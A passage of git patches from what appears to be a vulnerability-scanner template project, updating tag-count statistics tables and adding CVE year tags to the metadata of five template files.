+| b2evolution | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| ecoa | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | | mpsec | 1 | | | | | | | | | | vidyo | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| elfinder | 1 | | | | | | | | | -| lotus | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| kindeditor | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| eg | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| s3 | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| openvpn | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| chyrp | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| tidb | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 701f64d142..f02a577fe5 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 702 | pikpikcu | 267 | cves | 715 | info | 630 | http | 1930 | -| lfi | 253 | dhiyaneshdk | 253 | vulnerabilities | 291 | high | 546 | file | 46 | -| panel | 248 | daffainfo | 206 | exposed-panels | 248 | medium | 441 | network | 41 | -| xss | 240 | pdteam | 195 | exposures | 187 | critical | 269 | dns | 12 | -| exposure | 228 | geeknik | 151 | technologies | 182 | low | 148 | | | -| wordpress | 212 | dwisiswant0 | 132 | misconfiguration | 132 | | | | | -| rce | 197 | gy741 | 72 | takeovers | 63 | | | | | -| tech | 173 | madrobot | 62 | default-logins | 56 | | | | | -| cve2020 | 162 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 143 | pussycat0x | 58 | workflows | 36 | | | | | +| cve | 719 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | +| lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | +| panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | +| xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | +| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | +| wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | +| tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | From 34fd6fc688a21187532228fd2e0ffb6a3e4c6c64 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 10:36:20 +0000 Subject: [PATCH 2459/4083] Auto Update README [Tue Sep 21 10:36:20 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 1513152e9e..a6bb846598 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 702 | pikpikcu | 267 | cves | 715 | info | 630 | http | 1930 | -| lfi | 253 | dhiyaneshdk | 253 | vulnerabilities | 291 | high | 546 | file | 46 | -| panel | 248 | daffainfo | 206 | exposed-panels | 248 | medium | 441 | network | 41 | -| xss | 240 | pdteam | 195 | exposures | 187 | critical | 269 | dns | 12 | -| exposure | 228 | geeknik | 151 | technologies | 182 | low | 148 | | | -| wordpress | 212 | dwisiswant0 | 132 | misconfiguration | 132 | | | | | -| rce | 197 | gy741 | 72 | takeovers | 63 | | | | | -| tech | 173 | madrobot | 62 | default-logins | 56 | | | | | -| cve2020 | 162 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 143 | pussycat0x | 58 | workflows | 36 | | | | | +| cve | 719 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | +| lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | +| panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | +| xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | +| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | +| wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | +| tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | -**164 directories, 2104 files**. +**164 directories, 2122 files**. From 1c613882f8ef5afe57e80ee83f69e1a79543f879 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 16:17:16 +0530 Subject: [PATCH 2460/4083] Added missing cve tags --- cves/2017/CVE-2017-3528.yaml | 2 +- cves/2018/CVE-2018-16836.yaml | 2 +- cves/2018/CVE-2018-18775.yaml | 2 +- cves/2018/CVE-2018-18777.yaml | 2 +- cves/2019/CVE-2019-7254.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index b172154381..3163825810 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -7,7 +7,7 @@ info: reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 - tags: oracle,redirect + tags: cve,cve2017,oracle,redirect classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.40 diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index f0d316da1c..a7289fdaf2 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/45385 - tags: rubedo,lfi + tags: cve,cve2018,rubedo,lfi requests: - method: GET diff --git a/cves/2018/CVE-2018-18775.yaml b/cves/2018/CVE-2018-18775.yaml index 97386a655c..0682784ee0 100644 --- a/cves/2018/CVE-2018-18775.yaml +++ b/cves/2018/CVE-2018-18775.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter severity: medium - tags: microstrategy,xss + tags: cve,2018,microstrategy,xss reference: https://www.exploit-db.com/exploits/45755 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index 742080b74f..8745a1add1 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -9,7 +9,7 @@ info: allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 - tags: microstrategy,lfi + tags: cve,2018,microstrategy,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.30 diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml index 8e6ffca73b..0df71c2271 100644 --- a/cves/2019/CVE-2019-7254.yaml +++ b/cves/2019/CVE-2019-7254.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: 